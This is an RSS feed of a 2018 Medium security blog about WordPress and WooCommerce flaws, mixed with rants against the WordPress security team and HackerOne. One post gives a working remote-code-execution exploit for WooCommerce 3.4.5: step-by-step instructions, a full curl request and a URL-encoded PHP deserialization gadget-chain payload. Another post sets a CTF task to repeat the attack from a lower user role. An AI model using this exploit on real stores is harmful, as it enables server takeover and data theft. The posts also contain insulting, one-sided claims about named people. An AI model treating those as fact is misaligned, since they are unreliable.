<?xml version="1.0" encoding="UTF-8"?><rss xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:atom="http://www.w3.org/2005/Atom" version="2.0" xmlns:cc="http://cyber.law.harvard.edu/rss/creativeCommonsRssModule.html">
    <channel>
        <title><![CDATA[websec - Medium]]></title>
        <description><![CDATA[Attack sources + web application security - Medium]]></description>
        <link>https://medium.com/websec?source=rss----ab3c0cf4637---4</link>
        <image>
            <url>https://cdn-images-1.medium.com/proxy/1*TGH72Nnw24QL3iV9IOm4VA.png</url>
            <title>websec - Medium</title>
            <link>https://medium.com/websec?source=rss----ab3c0cf4637---4</link>
        </image>
        <generator>Medium</generator>
        <lastBuildDate>Sun, 23 Dec 2018 15:02:39 GMT</lastBuildDate>
        <atom:link href="https://medium.com/feed/websec" rel="self" type="application/rss+xml"/>
        <webMaster><![CDATA[yourfriends@medium.com]]></webMaster>
        <atom:link href="http://medium.superfeedr.com" rel="hub"/>
        <item>
            <title><![CDATA[CTF — Woo HerringPress]]></title>
            <link>https://medium.com/websec/ctf-woo-herringpress-1d71838ca9bb?source=rss----ab3c0cf4637---4</link>
            <guid isPermaLink="false">https://medium.com/p/1d71838ca9bb</guid>
            <category><![CDATA[security]]></category>
            <category><![CDATA[bug-bounty]]></category>
            <category><![CDATA[wordpress]]></category>
            <category><![CDATA[php]]></category>
            <dc:creator><![CDATA[slavco]]></dc:creator>
            <pubDate>Fri, 21 Dec 2018 14:01:48 GMT</pubDate>
            <atom:updated>2018-12-21T14:31:34.182Z</atom:updated>
            <content:encoded><![CDATA[<h3>CTF — Woo HerringPress</h3><figure><img alt="" src="https://cdn-images-1.medium.com/max/860/1*GuJSm_4_EwD3BQwdbgaEng.jpeg" /><figcaption>Triager with acceptable behavior in his natural habitat</figcaption></figure><p>Today I was ready to share something more interesting about my lovely <a href="https://wordpress.org/">punch bag</a>, but let us put a break and go step by step. WP and its related companies are putting their security exclusively in the hands of #bugbounty <a href="https://hackerone.com/automattic">platform</a> and it is impossible to work with them over another communication channels. That is why every knowledge regarding WP security I’ll share only with forks CalmPress and ClassicPress (if they want it) and plugin vendors who are not associated with them. They can read here and step by step to find vulnerabilities in their products based on conclusions from published CTF challenges (everything will be 0day issue).</p><p>Few months back I had reported security issue towards Woo project and they fixed it twice, <a href="https://woocommerce.wordpress.com/2018/08/29/woocommerce-3-4-5-security-fix-release-notes/">here</a> and <a href="https://woocommerce.wordpress.com/2018/10/11/woocommerce-3-4-6-security-fix-release-notes/">here</a> again :D :D :D</p><p>I have <a href="https://medium.com/websec/woocommerce-and-azis-with-scotch-bc9d561377e1">already shared the attack vector</a> after the first “fix” right before seccond one was ready.</p><h3>CTF task</h3><p>Setup &amp; task (described with shop manager):</p><ul><li>Install the latest WordPress</li><li>Grab the woocommerce-3–4–5</li><li>Perform the same attack with Contributor user role</li></ul><h3>Promo</h3><p>If you are wp developer or wp host provider or wp security product provider with valuable list of clients, we offer subscription list and we are exceptional (B2B only).</p><img src="https://medium.com/_/stat?event=post.clientViewed&referrerSource=full_rss&postId=1d71838ca9bb" width="1" height="1"><hr><p><a href="https://medium.com/websec/ctf-woo-herringpress-1d71838ca9bb">CTF — Woo HerringPress</a> was originally published in <a href="https://medium.com/websec">websec</a> on Medium, where people are continuing the conversation by highlighting and responding to this story.</p>]]></content:encoded>
        </item>
        <item>
            <title><![CDATA[Crocodile tears for accessibility]]></title>
            <link>https://medium.com/websec/crocodile-tears-for-accessibility-b96798f523b9?source=rss----ab3c0cf4637---4</link>
            <guid isPermaLink="false">https://medium.com/p/b96798f523b9</guid>
            <category><![CDATA[accessibility]]></category>
            <category><![CDATA[security]]></category>
            <category><![CDATA[gutenberg]]></category>
            <category><![CDATA[wordpress]]></category>
            <dc:creator><![CDATA[slavco]]></dc:creator>
            <pubDate>Thu, 01 Nov 2018 12:09:58 GMT</pubDate>
            <atom:updated>2018-11-07T13:21:11.365Z</atom:updated>
            <content:encoded><![CDATA[<figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*3YfLPgNqIkeZqlurWmj0ZQ.jpeg" /><figcaption>Image garbed from <a href="https://www.backpackertravel.org/">https://www.backpackertravel.org/</a> via google images :)</figcaption></figure><p>WordPress world is facing interesting point in its existence — release of gutenber. Everyone involved in WordPress in any way, knows that time in near future, for every WordPress related discussion will be measured in pre / after gutenberg terminology due changes that will be bring to us. This point in WordPress existence caused a lot of buzz around. Many forks are announced(only two are public: ClassicPress and CalmPress ), accessibility team lead resigned due very strong personal &amp; professional reasons, many plugin developers started to show their concerns regarding future of their products… At the end, accessibility concerns and issues become most loud in WordPress world. There is going a lot, but I must say from my perspective of view, many folks are abusing this movement in order to achieve something else…</p><h4>Reason for writing this</h4><p>It is simple, few people from the WP security team started with their behavior very well known to anyone who ever submitted vulnerability towards WordPress, finishing with <a href="https://jjj.blog/2018/10/wordpress-5-0-beta-1/">ranting</a> and <a href="https://twitter.com/JJJ/status/1057103294185828355">making fun</a> of WordPress on social networks. It is really interesting to see someone is really happy to put his criticism towards another people work, to measure pixels, to simulate first time on the keyboard experience, to cover himself under accessibility movement while in his area to practice censorship, ignorance and to delay its responsibilities, directly exposing complete eco system under a threat. You know, in order to be able someone to experience accessibility issues in one system, that system must be working for him at the first place.</p><p>Edit: Today 7th of November 2018 another hero took my attention.</p><style>body[data-twttr-rendered="true"] {background-color: transparent;}.twitter-tweet {margin: auto !important;}</style><blockquote class="twitter-tweet" data-conversation="none" data-align="center" data-dnt="true"><p>I&#39;ve written down my thoughts about the WordPress 5.0 timeline: <a rel="nofollow" href="https://t.co/KTk1ywtTmf">https://t.co/KTk1ywtTmf</a></p><p>&#x200a;&mdash;&#x200a;<a href="https://twitter.com/jdevalk/status/1059937701049393153">@jdevalk</a></p></blockquote><script src="//platform.twitter.com/widgets.js" charset="utf-8"></script><script>function notifyResize(height) {height = height ? height : document.documentElement.offsetHeight; var resized = false; if (window.donkey && donkey.resize) {donkey.resize(height); resized = true;}if (parent && parent._resizeIframe) {var obj = {iframe: window.frameElement, height: height}; parent._resizeIframe(obj); resized = true;}if (window.location && window.location.hash === "#amp=1" && window.parent && window.parent.postMessage) {window.parent.postMessage({sentinel: "amp", type: "embed-size", height: height}, "*");}if (window.webkit && window.webkit.messageHandlers && window.webkit.messageHandlers.resize) {window.webkit.messageHandlers.resize.postMessage(height); resized = true;}return resized;}twttr.events.bind('rendered', function (event) {notifyResize();}); twttr.events.bind('resize', function (event) {notifyResize();});</script><script>if (parent && parent._resizeIframe) {var maxWidth = parseInt(window.frameElement.getAttribute("width")); if ( 500  < maxWidth) {window.frameElement.setAttribute("width", "500");}}</script><p>The interesting thing about all of those (anti)gutenberg write ups is the following(they all seem to be written from some weird template):</p><ul><li>they wrote the blog posts with gutenberg</li><li>accessibility concerns are must</li><li>and main reasons for delay of the release date are bugs they faced</li></ul><p>Good! <em>Was WordPress bug free until now?</em> Even more, this guru says he have 10 developers involved in the story, but 10 days before gutenberg release he decided to go public and to announce that it is a crap… Well done :D :D :D <br>I don’t know if he have/sponsor some security team member, but if he was all in about accessibility and bug free WordPress then we would see a lot of reactions in the past.</p><h4>Insecure systems are not accessible at all</h4><p>Here we need to ask few questions towards security team that is accessibility related!</p><ul><li>How easy those people can handle ban from shared hosting of their WordPress due some silly DoS attack performed from phone?</li><li>How easy those people can handle data breach in their community, e-commerce, media setups?</li><li>How easy those people will adapt on new software if their company decide to move towards another solutions due WP security issues?</li></ul><p>There are many more questions and many many more use cases, but the fact remains that after a few years, WordPress security team, do almost nothing about any high / critical issue reported towards them, not to mention the fact that all of the issues at the end finished published as 0days.</p><img src="https://medium.com/_/stat?event=post.clientViewed&referrerSource=full_rss&postId=b96798f523b9" width="1" height="1"><hr><p><a href="https://medium.com/websec/crocodile-tears-for-accessibility-b96798f523b9">Crocodile tears for accessibility</a> was originally published in <a href="https://medium.com/websec">websec</a> on Medium, where people are continuing the conversation by highlighting and responding to this story.</p>]]></content:encoded>
        </item>
        <item>
            <title><![CDATA[ImagePress NOT]]></title>
            <link>https://medium.com/websec/imagepress-not-f9da64232940?source=rss----ab3c0cf4637---4</link>
            <guid isPermaLink="false">https://medium.com/p/f9da64232940</guid>
            <category><![CDATA[wordpress]]></category>
            <category><![CDATA[security]]></category>
            <dc:creator><![CDATA[slavco]]></dc:creator>
            <pubDate>Wed, 10 Oct 2018 22:50:23 GMT</pubDate>
            <atom:updated>2018-10-10T22:50:23.770Z</atom:updated>
            <content:encoded><![CDATA[<p>We all know that WordPress powers more than 30% of the web and web is let say colorful, full of images. Many web sites grab images from online services/pages with or without permission, but the end goal is obvious, to display the images towards end users — hot-linking we all know isn’t option. This means WP need to process the images, but before that images need to be handled — verified.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*pjf6DfFLQz6rMMDqffebYw.jpeg" /></figure><h3>ImageMagic</h3><p>We all know about <a href="https://imagetragick.com/">ImageTragic</a> and <a href="https://www.kb.cert.org/vuls/id/332928">current ghoscript issues</a>. In the past even WordPress shared their <a href="https://make.wordpress.org/core/2016/05/06/imagemagick-vulnerability-information/">concerns</a>, but is this enough? Past and current issues in IM coders (ghostscript can’t be disabled, will make it useless) will result in RCE towards the server, but as we all know WP is web application and impact from image processing libraries need to be considered from every perspective. This means that LFI, SSRF are also valid issues that could result in RCE towards WP and those scenarios aren’t taken into consideration.</p><p>From IM specification we can learn that many image formats are supported and many of them have some exotic features, but also from its code we can learn that not every supported format ships desired security considerations…</p><h3>Images</h3><p>Yes, WP supports upload of images (form upload, via its services endpoints or simply by pooling images from external locations — check popular plugins) and it supports image manipulation via wp_get_image_editor . From the code we learn that image format is determined by its extension wp_check_filetype and image processing library is chosen. ( If installed on the server/PHP ImageMagic) will be used and that means that if magic bytes and image format doesn’t work IM will try to solve the image, but also there is option IM to switch to another format processing while doing first one… Everyone will say that those are the final steps and image validation is done while setting image under storage / uploads directory. Yes, but <a href="https://medium.com/websec/fixed-lvl-goatpress-4ef45c288193">check this one</a>… or maybe there is option to completely bypass those lousy checks and put a file as valid image based only on its extension?</p><h3>Summary</h3><p>WordPress is doing nothing from image validation perspective ( not talking about another file formats if allowed for upload, but for it defaults) and like that gives open door towards:</p><ol><li>RCE attacks</li><li>LFI — will result in RCE towards WP</li><li>SSRF — will result in RCE in some modern hosting choices</li><li>CSRF — in case of browser content players usage</li></ol><p>Regarding server side software updates please take in consideration installed PHP versions on production servers, operating systems, IM version out there…</p><h3>Image is witness for the beauty, good, bad, scotch… :D</h3><iframe src="https://cdn.embedly.com/widgets/media.html?src=https%3A%2F%2Fwww.youtube.com%2Fembed%2F-rQqw4tk6yc%3Ffeature%3Doembed&amp;url=http%3A%2F%2Fwww.youtube.com%2Fwatch%3Fv%3D-rQqw4tk6yc&amp;image=https%3A%2F%2Fi.ytimg.com%2Fvi%2F-rQqw4tk6yc%2Fhqdefault.jpg&amp;key=a19fcc184b9711e1b4764040d3dc5c07&amp;type=text%2Fhtml&amp;schema=youtube" width="854" height="480" frameborder="0" scrolling="no"><a href="https://medium.com/media/01ad69766da0918f70143f665322b97f/href">https://medium.com/media/01ad69766da0918f70143f665322b97f/href</a></iframe><h3>Promo</h3><p>If you are wp developer or wp host provider or wp security product provider with valuable list of clients, we offer subscription list and we are exceptional (B2B only).</p><img src="https://medium.com/_/stat?event=post.clientViewed&referrerSource=full_rss&postId=f9da64232940" width="1" height="1"><hr><p><a href="https://medium.com/websec/imagepress-not-f9da64232940">ImagePress NOT</a> was originally published in <a href="https://medium.com/websec">websec</a> on Medium, where people are continuing the conversation by highlighting and responding to this story.</p>]]></content:encoded>
        </item>
        <item>
            <title><![CDATA[WooCommerce and Azis with scotch]]></title>
            <link>https://medium.com/websec/woocommerce-and-azis-with-scotch-bc9d561377e1?source=rss----ab3c0cf4637---4</link>
            <guid isPermaLink="false">https://medium.com/p/bc9d561377e1</guid>
            <category><![CDATA[woocommerce]]></category>
            <category><![CDATA[ecommerce]]></category>
            <category><![CDATA[wordpress]]></category>
            <category><![CDATA[security]]></category>
            <dc:creator><![CDATA[slavco]]></dc:creator>
            <pubDate>Tue, 09 Oct 2018 21:58:52 GMT</pubDate>
            <atom:updated>2018-10-09T22:28:14.485Z</atom:updated>
            <content:encoded><![CDATA[<p>Most of the topics here are WordPress related, written with heavy sarcasm, as only way to reach the ones who need to read and understand, instead to watch themselves in the mirror repeating how beautiful they are. Those people (I mean WP puppets who never miss a chance to give their boss compliment that he have biggest one) need to move their reference point of view from the one given by “Azis” after a bottle of “scotch”.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/500/1*3Y-4u8w9wOabFFD4zO84DQ.jpeg" /><figcaption>Azis under scotch, rdy!</figcaption></figure><p>Now let we focus on technical part and the RCE issue in current version of WooCommerce and after that I’ll explain why again disclosure and who is Azis the scotch lover.</p><h3>Issue</h3><p>As you all know, due the fact H1 as bug bounty platform steal from researchers under command from their JE shit machine, I had decided to go away from H1 until they put their “self proclaimed king of bug bounty” under control. That is why I had contacted “lovely” people from Automattic via email and gave them the issue. It is “unserialization of user input” that results with RCE in WooCommerce.</p><p>Issue exists in function wc_create_attribute and is caused by changing values inside string (serialized array in our case) out of the serialize / unserialize PHP routines.</p><pre>--------------------<br>$wpdb-&gt;query(<br>    $wpdb-&gt;prepare(<br>     &quot;UPDATE {$wpdb-&gt;postmeta} SET meta_value = REPLACE( meta_value, %s, %s ) WHERE meta_key = &#39;_product_attributes&#39;&quot;,<br>     &#39;s:&#39; . $old_attribute_name_length . &#39;:&quot;pa_&#39; . $args[&#39;old_slug&#39;] . &#39;&quot;&#39;,<br>     &#39;s:&#39; . $attribute_name_length . &#39;:&quot;pa_&#39; . $data[&#39;attribute_name&#39;] . &#39;&quot;&#39;<br>    )<br>   );<br>--------------------</pre><p>Technique for placing your payload in serialized output where manipulation of the string is done out of the serialize / unserialize PHP functions is described <a href="https://medium.com/websec/wordpress-4-8-3-wrecking-ball-b172e2511fad">here</a> and have many (not everything is disclosed) use cases / 0days.</p><h3>Fix</h3><p>Suddenly in two weeks in my inbox, developer showed up and told me that <a href="https://github.com/woocommerce/woocommerce/commit/4738162c25bb244631574d4230533b470f0ee8df#diff-dc3a1c9d68e161cfe6566b05971ec631">fix</a> is deployed and <a href="https://woocommerce.wordpress.com/2018/08/29/woocommerce-3-4-5-security-fix-release-notes/">credits</a> are given.</p><h3>Why this happened</h3><p>I was full of questions why I wasn’t asked for credits information and why I wasn’t asked to check the “solution”?! I know the answer, I got it! When I reported the issue, some Barry over there wasn’t too much worried regarding the issue, but told me that they can’t give me a bounty, due the fact I don’t use H1. I told him to focus on the problem and to leave “bounty” thing for the end of the process… That was the last contact and then “fix” showed up… H1 platform put all of those program managers into some sort of authorities mode with knowledge that they can hold researchers as hostages due some shitty bounties and to do what they want… No my friends .!.</p><h3>Vulnerability</h3><p>As I stated before wc_create_attribute function is vulnerable one. Guide how to exploit this vulnerability will give you idea if you already don’t know what is this vulnerability about. On your local WooCommerce setup:</p><ol><li>In your /wp-admin/edit.php?post_type=product&amp;page=product_attributes create attribute with name and slugwoo .</li><li>Create demo product ( simple one and virtual in my case) — save it</li><li>Add attribute test with value payload and capture the request. Will look something like this:</li></ol><pre>curl &#39;<a href="http://localhost/wpm/wcwp/wp-admin/admin-ajax.php&#39;">http://localhost/wpm/wcwp/wp-admin/admin-ajax.php&#39;</a> -H &#39;Cookie: wordpress_9885605d7e885262072a743d3cad590e=root%7C1539242989%7C5kmTl0sBjba6aI2qPk0Y2AuwwLmalX71vCaKOjUMDeu%7C4b8e2ff115b842870275a29e130279a35fc4a8880be9df869c4d0c65a8b6865e; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_9885605d7e885262072a743d3cad590e=root%7C1539242989%7C5kmTl0sBjba6aI2qPk0Y2AuwwLmalX71vCaKOjUMDeu%7Cfe2b2f68b3d71bd4e9f60c5c6e0d2232605d43e5eaedad160193a1c423e656b9; wp-settings-time-1=1539119916; __ar_v4=DCRDZA4OZJCETF5N5YL5SU%3A20180321%3A4%7CZAMJKSSZRREUVAYSLZ2K6S%3A20180321%3A4%7CQQBLQGEK7FB4RBKP6CVHTS%3A20180321%3A4; _wpfuuid=3bc2a390-6279-4d85-8a89-3309ccd1f201&#39; -H &#39;Origin: <a href="http://localhost&#39;">http://localhost&#39;</a> -H &#39;Accept-Encoding: gzip, deflate, br&#39; -H &#39;Accept-Language: en-US,en;q=0.8&#39; -H &#39;User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36&#39; -H &#39;Content-Type: application/x-www-form-urlencoded; charset=UTF-8&#39; -H &#39;Accept: */*&#39; -H &#39;Referer: <a href="http://localhost/wpm/wcwp/wp-admin/post.php?post=10&amp;action=edit&#39;">http://localhost/wpm/wcwp/wp-admin/post.php?post=10&amp;action=edit&#39;</a> -H &#39;X-Requested-With: XMLHttpRequest&#39; -H &#39;Connection: keep-alive&#39; --data &#39;post_id=10&amp;product_type=simple&amp;data=attribute_names%255B0%255D%3Dtest%26attribute_position%255B0%255D%3D0%26attribute_values%255B0%255D%3Dpayload%26attribute_visibility%255B0%255D%3D1&amp;action=woocommerce_save_attributes&amp;security=70d4636c87&#39; --compressed</pre><p>4. Replace the payload with the following string</p><pre>s%3A6%3A%22pa_woo%22s%3A6%3A%22pa_woo%22s%3A6%3A%22pa_woo%22s%3A6%3A%22pa_woo%22s%3A6%3A%22pa_woo%22s%3A6%3A%22pa_woo%22s%3A6%3A%22pa_woo%22s%3A6%3A%22pa_woo%22s%3A6%3A%22pa_woo%22s%3A6%3A%22pa_woo%22s%3A6%3A%22pa_woo%22s%3A6%3A%22pa_woo%22s%3A6%3A%22pa_woo%22s%3A6%3A%22pa_woo%22s%3A6%3A%22pa_woo%22s%3A6%3A%22pa_woo%22s%3A6%3A%22pa_woo%22s%3A6%3A%22pa_woo%22s%3A6%3A%22pa_woo%22s%3A6%3A%22pa_woo%22s%3A6%3A%22pa_woo%22s%3A6%3A%22pa_woo%22s%3A6%3A%22pa_woo%22s%3A6%3A%22pa_woo%22s%3A6%3A%22pa_woo%22s%3A6%3A%22pa_woo%22s%3A6%3A%22pa_woo%22s%3A6%3A%22pa_woo%22s%3A6%3A%22pa_woo%22s%3A6%3A%22pa_woo%22s%3A6%3A%22pa_woo%22s%3A6%3A%22pa_woo%22s%3A6%3A%22pa_woo%22s%3A6%3A%22pa_woo%22s%3A6%3A%22pa_woo%22s%3A6%3A%22pa_woo%22s%3A6%3A%22pa_woo%22s%3A6%3A%22pa_woo%22s%3A6%3A%22pa_woo%22s%3A6%3A%22pa_woo%22s%3A6%3A%22pa_woo%22s%3A6%3A%22pa_woo%22s%3A6%3A%22pa_woo%22s%3A6%3A%22pa_woo%22s%3A6%3A%22pa_woo%22s%3A6%3A%22pa_woo%22s%3A6%3A%22pa_woo%22s%3A6%3A%22pa_woo%22s%3A6%3A%22pa_woo%22s%3A6%3A%22pa_woo%22s%3A6%3A%22pa_woo%22s%3A6%3A%22pa_woo%22%22%3Bs%3A10%3A%22is_visible%22%3Bi%3A1%3Bs%3A12%3A%22is_variation%22%3Bi%3A0%3Bs%3A11%3A%22is_taxonomy%22%3Bi%3A0%3Bs%3A3%3A%22boo%22%3BO%3A19%3A%22WC_Log_Handler_File%22%3A1%3A%7Bs%3A10%3A%22%00%2A%00handles%22%3BC%3A33%3A%22Requests_Utility_FilteredIterator%22%3A82%3A%7Bx%3Ai%3A0%3Ba%3A2%3A%7Bi%3A0%3Bs%3A1%3A%221%22%3Bi%3A1%3Bs%3A5%3A%22azisY%22%3B%7D%3Bm%3Aa%3A1%3A%7Bs%3A11%3A%22%00%2A%00callback%22%3Bs%3A7%3A%22phpinfo%22%3B%7D%7D%7D%7D%7D</pre><p>You will get this one:</p><pre>curl &#39;<a href="http://localhost/wpm/wcwp/wp-admin/admin-ajax.php&#39;">http://localhost/wpm/wcwp/wp-admin/admin-ajax.php&#39;</a> -H &#39;Cookie: wordpress_9885605d7e885262072a743d3cad590e=root%7C1539242989%7C5kmTl0sBjba6aI2qPk0Y2AuwwLmalX71vCaKOjUMDeu%7C4b8e2ff115b842870275a29e130279a35fc4a8880be9df869c4d0c65a8b6865e; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_9885605d7e885262072a743d3cad590e=root%7C1539242989%7C5kmTl0sBjba6aI2qPk0Y2AuwwLmalX71vCaKOjUMDeu%7Cfe2b2f68b3d71bd4e9f60c5c6e0d2232605d43e5eaedad160193a1c423e656b9; wp-settings-time-1=1539119916; __ar_v4=DCRDZA4OZJCETF5N5YL5SU%3A20180321%3A4%7CZAMJKSSZRREUVAYSLZ2K6S%3A20180321%3A4%7CQQBLQGEK7FB4RBKP6CVHTS%3A20180321%3A4; _wpfuuid=3bc2a390-6279-4d85-8a89-3309ccd1f201&#39; -H &#39;Origin: <a href="http://localhost&#39;">http://localhost&#39;</a> -H &#39;Accept-Encoding: gzip, deflate, br&#39; -H &#39;Accept-Language: en-US,en;q=0.8&#39; -H &#39;User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36&#39; -H &#39;Content-Type: application/x-www-form-urlencoded; charset=UTF-8&#39; -H &#39;Accept: */*&#39; -H &#39;Referer: <a href="http://localhost/wpm/wcwp/wp-admin/post.php?post=10&amp;action=edit&#39;">http://localhost/wpm/wcwp/wp-admin/post.php?post=10&amp;action=edit&#39;</a> -H &#39;X-Requested-With: XMLHttpRequest&#39; -H &#39;Connection: keep-alive&#39; --data &#39;post_id=10&amp;product_type=simple&amp;data=attribute_names%255B0%255D%3Dtest%26attribute_position%255B0%255D%3D0%26attribute_values%255B0%255D%3Ds%3A6%3A%22pa_woo%22s%3A6%3A%22pa_woo%22s%3A6%3A%22pa_woo%22s%3A6%3A%22pa_woo%22s%3A6%3A%22pa_woo%22s%3A6%3A%22pa_woo%22s%3A6%3A%22pa_woo%22s%3A6%3A%22pa_woo%22s%3A6%3A%22pa_woo%22s%3A6%3A%22pa_woo%22s%3A6%3A%22pa_woo%22s%3A6%3A%22pa_woo%22s%3A6%3A%22pa_woo%22s%3A6%3A%22pa_woo%22s%3A6%3A%22pa_woo%22s%3A6%3A%22pa_woo%22s%3A6%3A%22pa_woo%22s%3A6%3A%22pa_woo%22s%3A6%3A%22pa_woo%22s%3A6%3A%22pa_woo%22s%3A6%3A%22pa_woo%22s%3A6%3A%22pa_woo%22s%3A6%3A%22pa_woo%22s%3A6%3A%22pa_woo%22s%3A6%3A%22pa_woo%22s%3A6%3A%22pa_woo%22s%3A6%3A%22pa_woo%22s%3A6%3A%22pa_woo%22s%3A6%3A%22pa_woo%22s%3A6%3A%22pa_woo%22s%3A6%3A%22pa_woo%22s%3A6%3A%22pa_woo%22s%3A6%3A%22pa_woo%22s%3A6%3A%22pa_woo%22s%3A6%3A%22pa_woo%22s%3A6%3A%22pa_woo%22s%3A6%3A%22pa_woo%22s%3A6%3A%22pa_woo%22s%3A6%3A%22pa_woo%22s%3A6%3A%22pa_woo%22s%3A6%3A%22pa_woo%22s%3A6%3A%22pa_woo%22s%3A6%3A%22pa_woo%22s%3A6%3A%22pa_woo%22s%3A6%3A%22pa_woo%22s%3A6%3A%22pa_woo%22s%3A6%3A%22pa_woo%22s%3A6%3A%22pa_woo%22s%3A6%3A%22pa_woo%22s%3A6%3A%22pa_woo%22s%3A6%3A%22pa_woo%22s%3A6%3A%22pa_woo%22%22%3Bs%3A10%3A%22is_visible%22%3Bi%3A1%3Bs%3A12%3A%22is_variation%22%3Bi%3A0%3Bs%3A11%3A%22is_taxonomy%22%3Bi%3A0%3Bs%3A3%3A%22boo%22%3BO%3A19%3A%22WC_Log_Handler_File%22%3A1%3A%7Bs%3A10%3A%22%00%2A%00handles%22%3BC%3A33%3A%22Requests_Utility_FilteredIterator%22%3A82%3A%7Bx%3Ai%3A0%3Ba%3A2%3A%7Bi%3A0%3Bs%3A1%3A%221%22%3Bi%3A1%3Bs%3A5%3A%22azisY%22%3B%7D%3Bm%3Aa%3A1%3A%7Bs%3A11%3A%22%00%2A%00callback%22%3Bs%3A7%3A%22phpinfo%22%3B%7D%7D%7D%7D%7D%26attribute_visibility%255B0%255D%3D1&amp;action=woocommerce_save_attributes&amp;security=70d4636c87&#39; --compressed</pre><p>5. Go to the /wp-admin/edit.php?post_type=product&amp;page=product_attributes and change the attribute and slugwoo into azisftw appropriately, save.</p><p>6. Visit the product page /product/azis-demo-product/ in my case and you will see something like this</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/957/1*RDAKTTgJkel1DRhfaz17WA.png" /></figure><p>7. Yes it is RCE, move attribute / slug into woo and continue with store usage.</p><h3>Attack surface</h3><p>Attack surface is much more bigger and demo described in this writing is just PoC. Hint: watch the problematic query ;-)</p><h3>Why disclosing this way</h3><p>I wrote to the developer that fix isn’t complete immediately when I saw the released version. Normally everyone there were watching towards me from Azis with scotch perspective and were like: we are not convinced in what you are talking about. After that they got convinced, they were shown the path Azis with scotch always forced and recommended, but as you can see they are comfortable to discriminate and underestimate people from that subjective point of view, but are not ready to apply those “solutions” in their products. I’m really sad to say this, but discrimination, supremacist behavior and underestimation towards people based on their origin are main attributes that WP rockstars have and like that they are transferred towards their associates causing huge loss for everyone! Those attributes are just boosted with usage of the H1 platform and I had already explained <a href="https://medium.com/websec/when-punters-fail-they-hide-in-the-ghetto-a30d312b4fb4">that</a>.</p><h3>They send Azis to make interview for opera singer position</h3><iframe src="https://cdn.embedly.com/widgets/media.html?src=https%3A%2F%2Fwww.youtube.com%2Fembed%2FRGRuHgKeFYs%3Ffeature%3Doembed&amp;url=http%3A%2F%2Fwww.youtube.com%2Fwatch%3Fv%3DRGRuHgKeFYs&amp;image=https%3A%2F%2Fi.ytimg.com%2Fvi%2FRGRuHgKeFYs%2Fhqdefault.jpg&amp;key=a19fcc184b9711e1b4764040d3dc5c07&amp;type=text%2Fhtml&amp;schema=youtube" width="640" height="480" frameborder="0" scrolling="no"><a href="https://medium.com/media/5c81d3f4dbe994a6980c3e741befc1ce/href">https://medium.com/media/5c81d3f4dbe994a6980c3e741befc1ce/href</a></iframe><h3>WordPress Cracked</h3><p>WordPress from security aspect is put in the hands of few people who have nothing to do with security. They are put there and they got the attitude, same as “mad king of bug bounty” always protected by “anti-soviet” super hero, who don’t get things clearly, but is stronK. With this attitude they have fractured WordPress so hard making it NOT USABLE except in the form of publishing platform for one user. This is first writing in the series I have announced and this one presents WordPress vulnerability, known by the WordPress security team, but not announced towards developers… As always…</p><h3>Promo</h3><p>If you are wp developer or wp host provider or wp security product provider with valuable list of clients, we offer subscription list and we are exceptional (B2B only).</p><img src="https://medium.com/_/stat?event=post.clientViewed&referrerSource=full_rss&postId=bc9d561377e1" width="1" height="1"><hr><p><a href="https://medium.com/websec/woocommerce-and-azis-with-scotch-bc9d561377e1">WooCommerce and Azis with scotch</a> was originally published in <a href="https://medium.com/websec">websec</a> on Medium, where people are continuing the conversation by highlighting and responding to this story.</p>]]></content:encoded>
        </item>
        <item>
            <title><![CDATA[When punters fail they hide in the ghetto]]></title>
            <link>https://medium.com/websec/when-punters-fail-they-hide-in-the-ghetto-a30d312b4fb4?source=rss----ab3c0cf4637---4</link>
            <guid isPermaLink="false">https://medium.com/p/a30d312b4fb4</guid>
            <category><![CDATA[security]]></category>
            <category><![CDATA[wordpress]]></category>
            <category><![CDATA[community]]></category>
            <category><![CDATA[marketing]]></category>
            <dc:creator><![CDATA[slavco]]></dc:creator>
            <pubDate>Sun, 09 Sep 2018 00:02:39 GMT</pubDate>
            <atom:updated>2018-09-09T00:08:37.420Z</atom:updated>
            <content:encoded><![CDATA[<figure><img alt="" src="https://cdn-images-1.medium.com/max/624/1*9IuqiceYPyKQaYmie1zm7w.jpeg" /><figcaption>PR person in action!</figcaption></figure><p>Punter is interesting word. Have two meanings:</p><ul><li>In the US/Canada means football position</li><li>In England/Europe means person who places bets</li></ul><p>Well those meanings have something in common e.g. when punters fail in their actions, then consequences are quite big towards their surrounding. Now, it is time to reveal the punters. Yes, you guess! They are WordPress security team and their PR person a.k.a. security team lead who is remarkable person, baked e.g. put on that position by two big authorities!</p><h4>Intro</h4><p>For those who don’t want to see the complete video I’ll put the major points from it e.g. things that lead towards this writing and are real proof regarding the fact how much centralized+corrupted this eco system become!</p><p><a href="https://videos.files.wordpress.com/R6JqEiTB/video-6a9a3f3ccc_hd.mp4">https://videos.files.wordpress.com/R6JqEiTB/video-6a9a3f3ccc_hd.mp4</a></p><ol><li>Ghetto: Hackerone</li><li>Gang: 50+ members security team (should be extended with members of another popular plugins)</li><li>C&amp;C server: Centralized update mechanism</li></ol><h4>Ghetto: Hackerone</h4><p>In the presentation is told the flow e.g. the live cycle of security issues reported towards a “team” and tools used. At the top is placed H1 and below there are all of the remaining tools / systems which are more than enough for controlling and handling security of one software. From my and another researchers experience, H1 is used as (don’t think it is abused by WordPress, H1 has nothing to do with “Responsible Disclosure” — foundation of the platform) extremely effective tool for silencing the reporters towards WordPress project and for evasion of responsible disclosure rules. Usually this is the case:</p><ol><li>Bug is reported</li><li>Triaged</li><li>Radio silence for 3 months at least</li><li>Security team asks for extra 3 months</li><li>Reporter hits mediation</li><li>Got their 3 months from support</li><li>Radio silence</li><li>Disclosure</li></ol><p>There is no need to believe me (read another posts here regarding WP, all of them are 0days/not fixed today), check this presentations from <a href="https://www.blackhat.com/docs/us-17/thursday/us-17-Tsai-A-New-Era-Of-SSRF-Exploiting-URL-Parser-In-Trending-Programming-Languages.pdf">Orange Tsai</a> and <a href="https://github.com/s-n-t/presentations">Sam Thomas</a>, 0days 